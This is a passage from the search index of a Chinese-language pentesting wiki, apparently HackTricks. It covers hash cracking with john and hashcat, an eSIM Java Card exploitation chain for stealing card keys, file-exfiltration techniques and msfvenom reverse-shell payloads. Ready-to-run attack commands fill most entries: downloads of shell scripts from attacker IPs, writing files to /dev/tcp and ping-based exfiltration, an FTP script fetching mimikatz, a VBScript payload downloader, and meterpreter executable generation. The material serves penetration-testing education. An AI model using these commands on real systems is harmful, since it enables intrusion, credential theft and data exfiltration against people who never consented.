sniffing 捕获敏感数据。 如果 switched Ethernet network 配置正确,你通常只会看到 broadcast frames 和发送到你 MAC address 的数据。","breadcrumbs":"Pentesting Network » Sniffing","id":"111","title":"Sniffing"},"1110":{"body":"bash gpg2john private_pgp.key #This will generate the hash and save it in a file\\njohn --wordlist=/usr/share/wordlists/rockyou.txt ./hash","breadcrumbs":"Brute Force - CheatSheet » PGP/GPG 私钥","id":"1110","title":"PGP/GPG 私钥"},"1111":{"body":"","breadcrumbs":"Brute Force - CheatSheet » Cisco","id":"1111","title":"Cisco"},"1112":{"body":"使用 https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py 然后使用 john","breadcrumbs":"Brute Force - CheatSheet » DPAPI 主密钥","id":"1112","title":"DPAPI 主密钥"},"1113":{"body":"如果你有一个带有密码保护的列的 xlsx 文件,你可以解除保护: 上传到 Google Drive ,密码将自动移除 要 手动 移除 : bash unzip file.xlsx\\ngrep -R \\"sheetProtection\\" ./*\\n# Find something like: \\n# Remove that line and rezip the file\\nzip -r file.xls .","breadcrumbs":"Brute Force - CheatSheet » Open Office 密码保护的列","id":"1113","title":"Open Office 密码保护的列"},"1114":{"body":"bash # From https://github.com/Ridter/p12tool\\n./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt\\n# From https://github.com/crackpkcs12/crackpkcs12\\ncrackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx","breadcrumbs":"Brute Force - CheatSheet » PFX 证书","id":"1114","title":"PFX 证书"},"1115":{"body":"哈希示例: https://openwall.info/wiki/john/sample-hashes","breadcrumbs":"Brute Force - CheatSheet » 工具","id":"1115","title":"工具"},"1116":{"body":"bash hash-identifier\\n> ","breadcrumbs":"Brute Force - CheatSheet » Hash-identifier","id":"1116","title":"Hash-identifier"},"1117":{"body":"Rockyou Probable-Wordlists Kaonashi Seclists - Passwords","breadcrumbs":"Brute Force - CheatSheet » Wordlists","id":"1117","title":"Wordlists"},"1118":{"body":"kwprocessor : 高级键盘行走生成器,具有可配置的基本字符、键盘映射和路线。 bash kwp64.exe basechars\\\\custom.base keymaps\\\\uk.keymap routes\\\\2-to-10-max-3-direction-changes.route -o 
D:\\\\Tools\\\\keywalk.txt","breadcrumbs":"Brute Force - CheatSheet » Wordlist Generation Tools","id":"1118","title":"Wordlist Generation Tools"},"1119":{"body":"读取 /etc/john/john.conf 并进行配置 bash john --wordlist=words.txt --rules --stdout > w_mutated.txt\\njohn --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules","breadcrumbs":"Brute Force - CheatSheet » John mutation","id":"1119","title":"John mutation"},"112":{"body":"bash sudo tcpdump -i udp port 53 #Listen to DNS request to discover what is searching the host\\ntcpdump -i icmp #Listen to icmp packets\\nsudo bash -c \\"sudo nohup tcpdump -i eth0 -G 300 -w \\\\\\"/tmp/dump-%m-%d-%H-%M-%S-%s.pcap\\\\\\" -W 50 \'tcp and (port 80 or port 443)\' &\\" 也可以通过 SSH 会话从远程机器捕获数据包,并使用 Wireshark 作为 GUI 实时查看。 ssh user@ tcpdump -i ens160 -U -s0 -w - | sudo wireshark -k -i -\\nssh @ tcpdump -i -U -s0 -w - \'port not 22\' | sudo wireshark -k -i - # Exclude SSH traffic","breadcrumbs":"Pentesting Network » TCPDump","id":"112","title":"TCPDump"},"1120":{"body":"Hashcat 攻击 字典攻击 (-a 0) 带规则 Hashcat 已经附带一个 包含规则的文件夹 ,但你可以在 这里找到其他有趣的规则 。 hashcat.exe -a 0 -m 1000 C:\\\\Temp\\\\ntlm.txt .\\\\rockyou.txt -r rules\\\\best64.rule Wordlist combinator 攻击 可以使用 hashcat 将 2 个字典组合成 1 个 。 如果列表 1 包含单词 \\"hello\\" ,而第二个列表包含 2 行单词 \\"world\\" 和 \\"earth\\" 。将生成单词 helloworld 和 helloearth。 bash # This will combine 2 wordlists\\nhashcat.exe -a 1 -m 1000 C:\\\\Temp\\\\ntlm.txt .\\\\wordlist1.txt .\\\\wordlist2.txt # Same attack as before but adding chars in the newly generated words\\n# In the previous example this will generate:\\n## hello-world!\\n## hello-earth!\\nhashcat.exe -a 1 -m 1000 C:\\\\Temp\\\\ntlm.txt .\\\\wordlist1.txt .\\\\wordlist2.txt -j $- -k $! 掩码攻击 (-a 3) bash # Mask attack with simple mask\\nhashcat.exe -a 3 -m 1000 C:\\\\Temp\\\\ntlm.txt ?u?l?l?l?l?l?l?l?d hashcat --help #will show the charsets and are as follows\\n? 
| Charset\\n===+=========\\nl | abcdefghijklmnopqrstuvwxyz\\nu | ABCDEFGHIJKLMNOPQRSTUVWXYZ\\nd | 0123456789\\nh | 0123456789abcdef\\nH | 0123456789ABCDEF\\ns | !\\"#$%&\'()*+,-./:;<=>?@[\\\\]^_`{|}~\\na | ?l?u?d?s\\nb | 0x00 - 0xff # Mask attack declaring custom charset\\nhashcat.exe -a 3 -m 1000 C:\\\\Temp\\\\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1\\n## -1 ?d?s defines a custom charset (digits and specials).\\n## ?u?l?l?l?l?l?l?l?1 is the mask, where \\"?1\\" is the custom charset. # Mask attack with variable password length\\n## Create a file called masks.hcmask with this content:\\n?d?s,?u?l?l?l?l?1\\n?d?s,?u?l?l?l?l?l?1\\n?d?s,?u?l?l?l?l?l?l?1\\n?d?s,?u?l?l?l?l?l?l?l?1\\n?d?s,?u?l?l?l?l?l?l?l?l?1\\n## Use it to crack the password\\nhashcat.exe -a 3 -m 1000 C:\\\\Temp\\\\ntlm.txt .\\\\masks.hcmask 字典 + 掩码 (-a 6) / 掩码 + 字典 (-a 7) 攻击 bash # Mask numbers will be appended to each word in the wordlist\\nhashcat.exe -a 6 -m 1000 C:\\\\Temp\\\\ntlm.txt \\\\wordlist.txt ?d?d?d?d # Mask numbers will be prepended to each word in the wordlist\\nhashcat.exe -a 7 -m 1000 C:\\\\Temp\\\\ntlm.txt ?d?d?d?d \\\\wordlist.txt Hashcat 模式 bash hashcat --example-hashes | grep -B1 -A2 \\"NTLM\\" 破解Linux哈希 - /etc/shadow文件 500 | md5crypt $1$, MD5(Unix) | Operating-Systems\\n3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems\\n7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems\\n1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems 破解Windows哈希 3000 | LM | Operating-Systems\\n1000 | NTLM | Operating-Systems 破解常见应用程序哈希 900 | MD4 | Raw Hash\\n0 | MD5 | Raw Hash\\n5100 | Half MD5 | Raw Hash\\n100 | SHA1 | Raw Hash\\n10800 | SHA-384 | Raw Hash\\n1400 | SHA-256 | Raw Hash\\n1700 | SHA-512 | Raw Hash tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Brute Force - CheatSheet » Hashcat","id":"1120","title":"Hashcat"},"1121":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Esim Javacard Exploitation » eSIM / Java Card VM Exploitation","id":"1121","title":"eSIM / Java Card VM Exploitation"},"1122":{"body":"嵌入式SIM(eSIM)作为 嵌入式UICC(eUICC) 智能卡实现,运行在安全元件上的 Java Card虚拟机(JC VM) 上。由于配置文件和小程序可以通过远程SIM配置(RSP) 空中 (OTA)进行配置,因此JC VM内部的任何内存安全缺陷瞬间成为 手机最特权组件内部的远程代码执行原语 。 本页面描述了由于getfield和putfield字节码中缺少类型安全检查而导致的Kigen的eUICC(Infineon SLC37 ESA1M2,ARM SC300)的真实世界完全妥协。相同的技术可以在其他省略卡上字节码验证的供应商中重用。","breadcrumbs":"Esim Javacard Exploitation » 概述","id":"1122","title":"概述"},"1123":{"body":"远程应用管理(RAM) eSIM配置文件可以嵌入任意Java Card小程序。配置通过标准APDU进行,可以通过SMS-PP(短消息服务点对点)或HTTPS进行隧道传输。如果攻击者拥有(或窃取)配置文件的 RAM密钥 ,他们可以远程INSTALL/LOAD恶意小程序。 Java Card字节码执行 安装后,小程序在VM内部执行。缺少运行时检查会导致内存损坏。","breadcrumbs":"Esim Javacard Exploitation » 攻击面","id":"1123","title":"攻击面"},"1124":{"body":"getfield / putfield应该仅在 对象引用 上操作。在Kigen eUICC中,这些指令从不验证栈上的操作数是 对象 还是 数组 引用。由于array.length字在正常对象的第一个实例字段的确切偏移量上,因此攻击者可以: 创建一个字节数组byte[] buf = new byte[0x100]; 将其强制转换为Object o = (Object)buf; 使用putfield覆盖相邻对象内部的 任何 16位值(包括VTABLE / ptr翻译条目)。 一旦内部指针被劫持,使用getfield读取 任意 内存。 java // Pseudo-bytecode sequence executed by the malicious applet\\n// buf = newarray byte 0x100\\n// o = (Object) buf // illegal but not verified\\n// putfield , 0xCAFE // arbitrary write\\n// ... set up read-what-where gadgets ... 
该原语提供了 任意读取/写入 eUICC地址空间的能力——足以转储设备唯一的ECC私钥,该密钥用于验证卡片与GSMA生态系统的连接。","breadcrumbs":"Esim Javacard Exploitation » 类型混淆原语","id":"1124","title":"类型混淆原语"},"1125":{"body":"枚举固件 – 使用未记录的GET DATA项DF1F: 80 CA DF 1F 00 // → \\"ECu10.13\\" (易受攻击) OTA安装恶意applet – 滥用TS.48通用测试配置文件的公开已知密钥,并推送传输CAP文件的SMS-PP片段(LOAD)后跟INSTALL: // 简化的APDU链\\n80 E6 02 00 // LOAD (块 n)\\n80 E6 0C 00 // INSTALL for load 触发类型混淆 – 当选择applet时,它执行写入-什么-在哪里操作以劫持指针表,并通过正常的APDU响应泄露内存。 提取GSMA证书密钥 – 私有EC密钥被复制到applet的RAM中并分块返回。 冒充eUICC – 被盗的密钥对+证书使攻击者能够作为合法卡片向 任何 RSP服务器进行身份验证(某些运营商可能仍需EID绑定)。 下载和修改配置文件 – 明文配置文件包含高度敏感的字段,如OPc、AMF、OTA密钥甚至额外的applet。攻击者可以: 将配置文件克隆到第二个eUICC(语音/SMS劫持); 在重新上传之前修补Java Card应用程序(例如,插入STK间谍软件); 提取运营商秘密以进行大规模滥用。","breadcrumbs":"Esim Javacard Exploitation » 端到端利用工作流程","id":"1125","title":"端到端利用工作流程"},"1126":{"body":"在 PHONE A 和 PHONE B 上安装相同的配置文件会导致移动交换中心将传入流量路由到最近注册的设备。一次Gmail 2FA SMS拦截会话足以绕过受害者的多因素身份验证。","breadcrumbs":"Esim Javacard Exploitation » 克隆/劫持演示","id":"1126","title":"克隆/劫持演示"},"1127":{"body":"研究人员发布了一个内部工具,带有bsc( 基本安全检查 )命令,可以立即显示Java Card VM是否易受攻击: scard> bsc\\n- castcheck [arbitrary int/obj casts]\\n- ptrgranularity [pointer granularity/tr table presence]\\n- locvaraccess [local variable access]\\n- stkframeaccess [stack frame access]\\n- instfieldaccess [instance field access]\\n- objarrconfusion [object/array size field confusion] 框架附带的模块: introspector – 完整的虚拟机和内存探索器 (~1.7 MB Java) security-test – 通用验证绕过小程序 (~150 KB) exploit – 100% 可靠的 Kigen eUICC 破坏 (~72 KB)","breadcrumbs":"Esim Javacard Exploitation » 自动化测试与利用工具包","id":"1127","title":"自动化测试与利用工具包"},"1128":{"body":"卡内字节码验证 – 强制执行完整的控制流和数据流类型跟踪,而不仅仅是栈顶。 隐藏数组头 – 将 length 放置在重叠对象字段之外。 加强 RAM 密钥策略 – 永远不要随公共密钥一起发布配置文件;在测试配置文件中禁用 INSTALL(在 GSMA TS.48 v7 中解决)。 RSP 服务器端启发式 – 限制每个 EID 的配置文件下载速率,监控地理异常,验证证书的新鲜度。","breadcrumbs":"Esim Javacard Exploitation » 缓解措施","id":"1128","title":"缓解措施"},"1129":{"body":"查询 GET DATA DF1F – 易受攻击的固件字符串 ECu10.13 表示 Kigen。 检查 RAM 密钥是否已知 ‑> 尝试 OTA INSTALL/LOAD。 在小程序安装后,暴力破解简单的类型转换原始类型(objarrconfusion)。 
尝试读取安全域私钥 – 成功 = 完全破坏。","breadcrumbs":"Esim Javacard Exploitation » 渗透测试人员快速检查清单","id":"1129","title":"渗透测试人员快速检查清单"},"113":{"body":"bash net.sniff on\\nnet.sniff stats\\nset net.sniff.output sniffed.pcap #Write captured packets to file\\nset net.sniff.local #If true it will consider packets from/to this computer, otherwise it will skip them (default=false)\\nset net.sniff.filter #BPF filter for the sniffer (default=not arp)\\nset net.sniff.regexp #If set only packets matching this regex will be considered","breadcrumbs":"Pentesting Network » Bettercap","id":"113","title":"Bettercap"},"1130":{"body":"Security Explorations – eSIM security GSMA TS.48 Generic Test Profile v7.0 Java Card VM Specification 3.1 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Esim Javacard Exploitation » 参考文献","id":"1130","title":"参考文献"},"1131":{"body":"Reading time: 10 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Exfiltration » Exfiltration","id":"1131","title":"Exfiltration"},"1132":{"body":"查看 https://lots-project.com/ 以查找可以被滥用的常见白名单域名","breadcrumbs":"Exfiltration » 常见的白名单域名以提取信息","id":"1132","title":"常见的白名单域名以提取信息"},"1133":{"body":"Linux bash base64 -w0 #Encode file\\nbase64 -d file #Decode file Windows certutil -encode payload.dll payload.b64\\ncertutil -decode payload.b64 payload.dll","breadcrumbs":"Exfiltration » Copy&Paste Base64","id":"1133","title":"Copy&Paste Base64"},"1134":{"body":"Linux bash wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py\\nwget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm\\ncurl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py\\nfetch 10.10.14.14:8000/shell.py #FreeBSD Windows bash certutil -urlcache -split -f http://webserver/payload.b64 payload.b64\\nbitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\\\\downloads\\\\examplefile.pdf #PS\\n(New-Object Net.WebClient).DownloadFile(\\"http://10.10.14.2:80/taskkill.exe\\",\\"C:\\\\Windows\\\\Temp\\\\taskkill.exe\\")\\nInvoke-WebRequest \\"http://10.10.14.2:80/taskkill.exe\\" -OutFile \\"taskkill.exe\\"\\nwget \\"http://10.10.14.2/nc.bat.exe\\" -OutFile \\"C:\\\\ProgramData\\\\unifivideo\\\\taskkill.exe\\" Import-Module BitsTransfer\\nStart-BitsTransfer -Source $url -Destination $output\\n#OR\\nStart-BitsTransfer -Source $url -Destination $output -Asynchronous","breadcrumbs":"Exfiltration » HTTP","id":"1134","title":"HTTP"},"1135":{"body":"SimpleHttpServerWithFileUploads SimpleHttpServer 打印 GET 和 POST(以及头部) Python 模块 uploadserver : bash # Listen to files\\npython3 -m pip install --user uploadserver\\npython3 -m uploadserver\\n# With basic auth:\\n# python3 -m uploadserver --basic-auth hello:world # Send a file\\ncurl -X POST http://HOST/upload -H -F \'files=@file.txt\'\\n# With basic auth:\\n# curl -X POST http://HOST/upload -H -F \'files=@file.txt\' -u 
hello:world","breadcrumbs":"Exfiltration » 上传文件","id":"1135","title":"上传文件"},"1136":{"body":"python # from https://gist.github.com/dergachev/7028596\\n# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/\\n# generate server.xml with the following command:\\n# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes\\n# run as follows:\\n# python simple-https-server.py\\n# then in your browser, visit:\\n# https://localhost:443 ### PYTHON 2\\nimport BaseHTTPServer, SimpleHTTPServer\\nimport ssl httpd = BaseHTTPServer.HTTPServer((\'0.0.0.0\', 443), SimpleHTTPServer.SimpleHTTPRequestHandler)\\nhttpd.socket = ssl.wrap_socket (httpd.socket, certfile=\'./server.pem\', server_side=True)\\nhttpd.serve_forever()\\n### ### PYTHON3\\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\\nimport ssl httpd = HTTPServer((\'0.0.0.0\', 443), BaseHTTPRequestHandler)\\nhttpd.socket = ssl.wrap_socket(httpd.socket, certfile=\\"./server.pem\\", server_side=True)\\nhttpd.serve_forever()\\n### ### USING FLASK\\nfrom flask import Flask, redirect, request\\nfrom urllib.parse import quote\\napp = Flask(__name__)\\n@app.route(\'/\')\\ndef root():\\nprint(request.get_json())\\nreturn \\"OK\\"\\nif __name__ == \\"__main__\\":\\napp.run(ssl_context=\'adhoc\', debug=True, host=\\"0.0.0.0\\", port=8443)\\n###","breadcrumbs":"Exfiltration » HTTPS 服务器","id":"1136","title":"HTTPS 服务器"},"1137":{"body":"","breadcrumbs":"Exfiltration » FTP","id":"1137","title":"FTP"},"1138":{"body":"bash pip3 install pyftpdlib\\npython3 -m pyftpdlib -p 21","breadcrumbs":"Exfiltration » FTP 服务器 (python)","id":"1138","title":"FTP 服务器 (python)"},"1139":{"body":"sudo npm install -g ftp-srv --save\\nftp-srv ftp://0.0.0.0:9876 --root /tmp","breadcrumbs":"Exfiltration » FTP 服务器 (NodeJS)","id":"1139","title":"FTP 服务器 (NodeJS)"},"114":{"body":"显然。","breadcrumbs":"Pentesting Network » Wireshark","id":"114","title":"Wireshark"},"1140":{"body":"bash apt-get update && apt-get install 
pure-ftp bash #Run the following script to configure the FTP server\\n#!/bin/bash\\ngroupadd ftpgroup\\nuseradd -g ftpgroup -d /dev/null -s /etc ftpuser\\npure-pwd useradd fusr -u ftpuser -d /ftphome\\npure-pw mkdb\\ncd /etc/pure-ftpd/auth/\\nln -s ../conf/PureDB 60pdb\\nmkdir -p /ftphome\\nchown -R ftpuser:ftpgroup /ftphome/\\n/etc/init.d/pure-ftpd restart","breadcrumbs":"Exfiltration » FTP 服务器 (pure-ftp)","id":"1140","title":"FTP 服务器 (pure-ftp)"},"1141":{"body":"bash #Work well with python. With pure-ftp use fusr:ftp\\necho open 10.11.0.41 21 > ftp.txt\\necho USER anonymous >> ftp.txt\\necho anonymous >> ftp.txt\\necho bin >> ftp.txt\\necho GET mimikatz.exe >> ftp.txt\\necho bye >> ftp.txt\\nftp -n -v -s:ftp.txt","breadcrumbs":"Exfiltration » Windows 客户端","id":"1141","title":"Windows 客户端"},"1142":{"body":"Kali 作为服务器 bash kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory\\nkali_op2> smbserver.py -smb2support name /path/folder # Share a folder\\n#For new Win10 versions\\nimpacket-smbserver -smb2support -user test -password test test `pwd` 或创建一个 smb 共享 使用 samba : bash apt-get install samba\\nmkdir /tmp/smb\\nchmod 777 /tmp/smb\\n#Add to the end of /etc/samba/smb.conf this:\\n[public]\\ncomment = Samba on Ubuntu\\npath = /tmp/smb\\nread only = no\\nbrowsable = yes\\nguest ok = Yes\\n#Start samba\\nservice smbd restart Windows bash CMD-Wind> \\\\\\\\10.10.14.14\\\\path\\\\to\\\\exe\\nCMD-Wind> net use z: \\\\\\\\10.10.14.14\\\\test /user:test test #For SMB using credentials WindPS-1> New-PSDrive -Name \\"new_disk\\" -PSProvider \\"FileSystem\\" -Root \\"\\\\\\\\10.10.14.9\\\\kali\\"\\nWindPS-2> cd new_disk:","breadcrumbs":"Exfiltration » SMB","id":"1142","title":"SMB"},"1143":{"body":"攻击者必须运行 SSHd。 bash scp @:/","breadcrumbs":"Exfiltration » SCP","id":"1143","title":"SCP"},"1144":{"body":"如果受害者有SSH,攻击者可以将受害者的目录挂载到攻击者。 bash sudo apt-get install sshfs\\nsudo mkdir /mnt/sshfs\\nsudo sshfs -o allow_other,default_permissions @:/ 
/mnt/sshfs/","breadcrumbs":"Exfiltration » SSHFS","id":"1144","title":"SSHFS"},"1145":{"body":"bash nc -lvnp 4444 > new_file\\nnc -vn 4444 < exfil_file","breadcrumbs":"Exfiltration » NC","id":"1145","title":"NC"},"1146":{"body":"","breadcrumbs":"Exfiltration » /dev/tcp","id":"1146","title":"/dev/tcp"},"1147":{"body":"bash nc -lvnp 80 > file #Inside attacker\\ncat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim","breadcrumbs":"Exfiltration » 从受害者下载文件","id":"1147","title":"从受害者下载文件"},"1148":{"body":"bash nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker\\n# Inside victim\\nexec 6< /dev/tcp/10.10.10.10/4444\\ncat <&6 > file.txt 感谢 @BinaryShadow_","breadcrumbs":"Exfiltration » 上传文件到受害者","id":"1148","title":"上传文件到受害者"},"1149":{"body":"bash # To exfiltrate the content of a file via pings you can do:\\nxxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line ; done\\n#This will 4bytes per ping packet (you could probably increase this until 16) python from scapy.all import *\\n#This is ippsec receiver created in the HTB machine Mischief\\ndef process_packet(pkt):\\nif pkt.haslayer(ICMP):\\nif pkt[ICMP].type == 0:\\ndata = pkt[ICMP].load[-4:] #Read the 4bytes interesting\\nprint(f\\"{data.decode(\'utf-8\')}\\", flush=True, end=\\"\\") sniff(iface=\\"tun0\\", prn=process_packet)","breadcrumbs":"Exfiltration » ICMP","id":"1149","title":"ICMP"},"115":{"body":"你可以使用像 https://github.com/lgandx/PCredz 这样的工具从 pcap 或实时接口解析凭证。","breadcrumbs":"Pentesting Network » 捕获凭证","id":"115","title":"捕获凭证"},"1150":{"body":"如果您可以将数据发送到SMTP服务器,则可以使用Python创建一个SMTP来接收数据: bash sudo python -m smtpd -n -c DebuggingServer :25","breadcrumbs":"Exfiltration » SMTP","id":"1150","title":"SMTP"},"1151":{"body":"默认情况下在 XP 和 2003 中(在其他版本中需要在安装时显式添加) 在 Kali 中, 启动 TFTP 服务器 : bash #I didn\'t get this options working and I prefer the python option\\nmkdir /tftp\\natftpd --daemon --port 69 /tftp\\ncp /path/tp/nc.exe /tftp 在Python中的TFTP服务器: bash pip install ptftpd\\nptftpd -p 69 tap0 . 
# ptftp -p 在 受害者 上,连接到Kali服务器: bash tftp -i get nc.exe","breadcrumbs":"Exfiltration » TFTP","id":"1151","title":"TFTP"},"1152":{"body":"使用 PHP 单行代码下载文件: bash echo \\"\\" > down2.php","breadcrumbs":"Exfiltration » PHP","id":"1152","title":"PHP"},"1153":{"body":"bash Attacker> python -m SimpleHTTPServer 80 受害者 bash echo strUrl = WScript.Arguments.Item(0) > wget.vbs\\necho StrFile = WScript.Arguments.Item(1) >> wget.vbs\\necho Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs\\necho Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs\\necho Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs\\necho Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs\\necho Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs\\necho Err.Clear >> wget.vbs\\necho Set http = Nothing >> wget.vbs\\necho Set http = CreateObject(\\"WinHttp.WinHttpRequest.5.1\\") >> wget.vbs\\necho If http Is Nothing Then Set http = CreateObject(\\"WinHttp.WinHttpRequest\\") >> wget.vbs\\necho If http Is Nothing Then Set http =CreateObject(\\"MSXML2.ServerXMLHTTP\\") >> wget.vbs\\necho If http Is Nothing Then Set http = CreateObject(\\"Microsoft.XMLHTTP\\") >> wget.vbs\\necho http.Open \\"GET\\", strURL, False >> wget.vbs\\necho http.Send >> wget.vbs\\necho varByteArray = http.ResponseBody >> wget.vbs\\necho Set http = Nothing >> wget.vbs\\necho Set fs = CreateObject(\\"Scripting.FileSystemObject\\") >> wget.vbs\\necho Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs\\necho strData = \\"\\" >> wget.vbs\\necho strBuffer = \\"\\" >> wget.vbs\\necho For lngCounter = 0 to UBound(varByteArray) >> wget.vbs\\necho ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs\\necho Next >> wget.vbs\\necho ts.Close >> wget.vbs bash cscript wget.vbs http://10.11.0.5/evil.exe evil.exe","breadcrumbs":"Exfiltration » VBScript","id":"1153","title":"VBScript"},"1154":{"body":"debug.exe程序不仅允许检查二进制文件,还具有 从十六进制重建它们的能力 
。这意味着通过提供二进制文件的十六进制,debug.exe可以生成二进制文件。然而,重要的是要注意,debug.exe 组装文件的大小限制为64 kb ,而且它是 16 位程序,只存在于 32 位 Windows 上(64 位 Windows 没有 debug.exe,需改用 certutil -decode 或 PowerShell 传输)。
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Shells - Linux","id":"1156","title":"Shells - Linux"},"1157":{"body":"","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Shells - Windows","id":"1157","title":"Shells - Windows"},"1158":{"body":"","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet","id":"1158","title":"MSFVenom - CheatSheet"},"1159":{"body":"","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Full TTYs","id":"1159","title":"Full TTYs"},"116":{"body":"","breadcrumbs":"Pentesting Network » 局域网攻击","id":"116","title":"局域网攻击"},"1160":{"body":"https://reverse-shell.sh/ https://www.revshells.com/ https://github.com/ShutdownRepo/shellerator https://github.com/0x00-0x00/ShellPop https://github.com/cybervaca/ShellReverse https://liftoff.github.io/pyminifier/ https://github.com/xct/xc/ https://weibell.github.io/reverse-shell-generator/ https://github.com/t0thkr1s/revshellgen https://github.com/mthbernardes/rsg tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » 自动生成的 Shell","id":"1160","title":"自动生成的 Shell"},"1161":{"body":"Reading time: 5 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » MSFVenom - CheatSheet","id":"1161","title":"MSFVenom - CheatSheet"},"1162":{"body":"msfvenom -p -e -f -i LHOST= 还可以使用 -a 来指定架构或 --platform","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » 基本 msfvenom","id":"1162","title":"基本 msfvenom"},"1163":{"body":"bash msfvenom -l payloads #Payloads\\nmsfvenom -l encoders #Encoders","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » 列表","id":"1163","title":"列表"},"1164":{"body":"bash -b \\"\\\\x00\\\\x0a\\\\x0d\\"\\n-f c\\n-e x86/shikata_ga_nai -i 5\\nEXITFUNC=thread\\nPrependSetuid=True #Use this to create a shellcode that will execute something with SUID","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » 创建 shellcode 时的常见参数","id":"1164","title":"创建 shellcode 时的常见参数"},"1165":{"body":"","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » Windows","id":"1165","title":"Windows"},"1166":{"body":"bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » 反向 Shell","id":"1166","title":"反向 Shell"},"1167":{"body":"bash msfvenom -p windows/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f exe > bind.exe","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » 绑定 Shell","id":"1167","title":"绑定 Shell"},"1168":{"body":"bash msfvenom -p 